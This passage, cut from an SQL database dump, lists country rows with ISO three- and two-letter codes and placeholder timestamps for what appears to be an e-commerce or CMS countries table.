Faso','BFA','BF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(35,1,'Burundi','BDI','BI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(36,1,'Cambodia','KHM','KH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(37,1,'Cameroon','CMR','CM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(38,1,'Canada','CAN','CA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(39,1,'Cape Verde','CPV','CV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(40,1,'Cayman Islands','CYM','KY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(41,1,'Central African Republic','CAF','CF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(42,1,'Chad','TCD','TD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(43,1,'Chile','CHL','CL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(44,1,'China','CHN','CN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(45,1,'Christmas Island','CXR','CX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(46,1,'Cocos (Keeling) Islands','CCK','CC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(47,1,'Colombia','COL','CO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(48,1,'Comoros','COM','KM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(49,1,'Congo','COG','CG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(50,1,'Cook Islands','COK','CK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(51,1,'Costa Rica','CRI','CR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(52,1,'Cote D\'Ivoire','CIV','CI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(53,1,'Croatia','HRV','HR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(54,1,'Cuba','CUB','CU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(55,1,'Cyprus','CYP','CY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(56,1,'Czech Republic','CZE','CZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(57,1,'Denmark','DNK','DK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,'Djibouti','DJI','DJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(59,1,'Dominica','DMA','DM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,'Dominican Republic','DOM','DO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,'East Timor','TMP','TP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,'Ecuador','ECU','EC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,'Egypt','EGY','EG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,'El Salvador','SLV','SV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,'Equatorial Guinea','GNQ','GQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(66,1,'Eritrea','ERI','ER',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,'Estonia','EST','EE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,'Ethiopia','ETH','ET',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,'Falkland Islands (Malvinas)','FLK','FK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,'Faroe Islands','FRO','FO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(71,1,'Fiji','FJI','FJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(72,1,'Finland','FIN','FI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,'France','FRA','FR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,'French Guiana','GUF','GF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,'French Polynesia','PYF','PF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,'French Southern Territories','ATF','TF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,'Gabon','GAB','GA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,'Gambia','GMB','GM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,'Georgia','GEO','GE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,'Germany','DEU','DE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,'Ghana','GHA','GH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,'Gibraltar','GIB','GI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,'Greece','GRC','GR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,'Greenland','GRL','GL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,'Grenada','GRD','GD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,'Guadeloupe','GLP','GP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(88,1,'Guam','GUM','GU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,'Guatemala','GTM','GT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,'Guinea','GIN','GN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(91,1,'Guinea-bissau','GNB','GW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,'Guyana','GUY','GY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,'Haiti','HTI','HT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,'Heard and Mc Donald Islands','HMD','HM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(95,1,'Honduras','HND','HN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,'Hong Kong','HKG','HK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,'Hungary','HUN','HU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,'Iceland','ISL','IS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(99,1,'India','IND','IN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,'Indonesia','IDN','ID',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(101,1,'Iran (Islamic Republic of)','IRN','IR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,'Iraq','IRQ','IQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(103,1,'Ireland','IRL','IE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(104,1,'Israel','ISR','IL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,'Italy','ITA','IT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,'Jamaica','JAM','JM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,'Japan','JPN','JP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,'Jordan','JOR','JO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,'Kazakhstan','KAZ','KZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,'Kenya','KEN','KE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,'Kiribati','KIR','KI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,'Korea, Democratic People\'s Republic of','PRK','KP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,'Korea, Republic of','KOR','KR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,'Kuwait','KWT','KW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(115,1,'Kyrgyzstan','KGZ','KG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,'Lao People\'s Democratic Republic','LAO','LA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,'Latvia','LVA','LV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,'Lebanon','LBN','LB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,'Lesotho','LSO','LS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,'Liberia','LBR','LR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,'Libya','LBY','LY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,'Liechtenstein','LIE','LI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(123,1,'Lithuania','LTU','LT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,'Luxembourg','LUX','LU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,'Macau','MAC','MO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,'Macedonia, The Former Yugoslav Republic of','MKD','MK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,'Madagascar','MDG','MG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,'Malawi','MWI','MW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(129,1,'Malaysia','MYS','MY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,'Maldives','MDV','MV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,'Mali','MLI','ML',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,'Malta','MLT','MT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(133,1,'Marshall Islands','MHL','MH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,'Martinique','MTQ','MQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,'Mauritania','MRT','MR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,'Mauritius','MUS','MU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,'Mayotte','MYT','YT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(138,1,'Mexico','MEX','MX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,'Micronesia, Federated States of','FSM','FM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,'Moldova, Republic of','MDA','MD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,'Monaco','MCO','MC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,'Mongolia','MNG','MN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(143,1,'Montserrat','MSR','MS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,'Morocco','MAR','MA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(145,1,'Mozambique','MOZ','MZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(146,1,'Myanmar','MMR','MM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(147,1,'Namibia','NAM','NA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,'Nauru','NRU','NR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(149,1,'Nepal','NPL','NP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(150,1,'Netherlands','NLD','NL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,'Netherlands Antilles','ANT','AN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,'New Caledonia','NCL','NC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,'New Zealand','NZL','NZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,'Nicaragua','NIC','NI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(155,1,'Niger','NER','NE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,'Nigeria','NGA','NG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(157,1,'Niue','NIU','NU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,'Norfolk Island','NFK','NF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,'Northern Mariana Islands','MNP','MP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,'Norway','NOR','NO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,'Oman','OMN','OM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,'Pakistan','PAK','PK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,'Palau','PLW','PW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,'Panama','PAN','PA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,'Papua New Guinea','PNG','PG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,'Paraguay','PRY','PY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,'Peru','PER','PE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,'Philippines','PHL','PH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,'Pitcairn','PCN','PN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,'Poland','POL','PL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,'Portugal','PRT','PT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,'Puerto Rico','PRI','PR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,'Qatar','QAT','QA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,'Reunion','REU','RE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,'Romania','ROM','RO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,'Russian Federation','RUS','RU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,'Rwanda','RWA','RW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,'Saint Kitts and Nevis','KNA','KN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,'Saint Lucia','LCA','LC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,'Saint Vincent and the Grenadines','VCT','VC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,'Samoa','WSM','WS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,'San Marino','SMR','SM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,'Sao Tome and Principe','STP','ST',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,'Saudi Arabia','SAU','SA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,'Senegal','SEN','SN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,'Seychelles','SYC','SC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,'Sierra Leone','SLE','SL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,'Singapore','SGP','SG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,'Slovakia','SVK','SK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,'Slovenia','SVN','SI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,'Solomon Islands','SLB','SB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,'Somalia','SOM','SO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,'South Africa','ZAF','ZA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,'South Georgia and the South Sandwich Islands','SGS','GS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,'Spain','ESP','ES',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,'Sri Lanka','LKA','LK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,'St. Helena','SHN','SH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,'St. Pierre and Miquelon','SPM','PM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,'Sudan','SDN','SD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,'Suriname','SUR','SR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,'Svalbard and Jan Mayen Islands','SJM','SJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(202,1,'Swaziland','SWZ','SZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(203,1,'Sweden','SWE','SE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(204,1,'Switzerland','CHE','CH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(205,1,'Syrian Arab Republic','SYR','SY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(206,1,'Taiwan','TWN','TW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(207,1,'Tajikistan','TJK','TJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(208,1,'Tanzania, United Republic of','TZA','TZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(209,1,'Thailand','THA','TH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(210,1,'Togo','TGO','TG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(211,1,'Tokelau','TKL','TK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(212,1,'Tonga','TON','TO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(213,1,'Trinidad and Tobago','TTO','TT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(214,1,'Tunisia','TUN','TN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(215,1,'Turkey','TUR','TR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(216,1,'Turkmenistan','TKM','TM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(217,1,'Turks and Caicos Islands','TCA','TC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(218,1,'Tuvalu','TUV','TV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(219,1,'Uganda','UGA','UG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(220,1,'Ukraine','UKR','UA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(221,1,'United Arab Emirates','ARE','AE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(222,1,'United Kingdom','GBR','GB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(223,1,'United States','USA','US',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(224,1,'United States Minor Outlying Islands','UMI','UM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(225,1,'Uruguay','URY','UY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(226,1,'Uzbekistan','UZB','UZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(227,1,'Vanuatu','VUT','VU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(228,1,'Vatican City State (Holy See)','VAT','VA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(229,1,'Venezuela','VEN','VE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(230,1,'Viet Nam','VNM','VN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(231,1,'Virgin Islands (British)','VGB','VG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(232,1,'Virgin Islands (U.S.)','VIR','VI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(233,1,'Wallis and Futuna Islands','WLF','WF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(234,1,'Western Sahara','ESH','EH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(235,1,'Yemen','YEM','YE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(237,1,'The Democratic Republic of Congo','DRC','DC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(238,1,'Zambia','ZMB','ZM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(239,1,'Zimbabwe','ZWE','ZW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(240,1,'East Timor','XET','XE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(241,1,'Jersey','JEY','JE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(242,1,'St. Barthelemy','XSB','XB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(243,1,'St. Eustatius','XSE','XU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(244,1,'Canary Islands','XCA','XC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 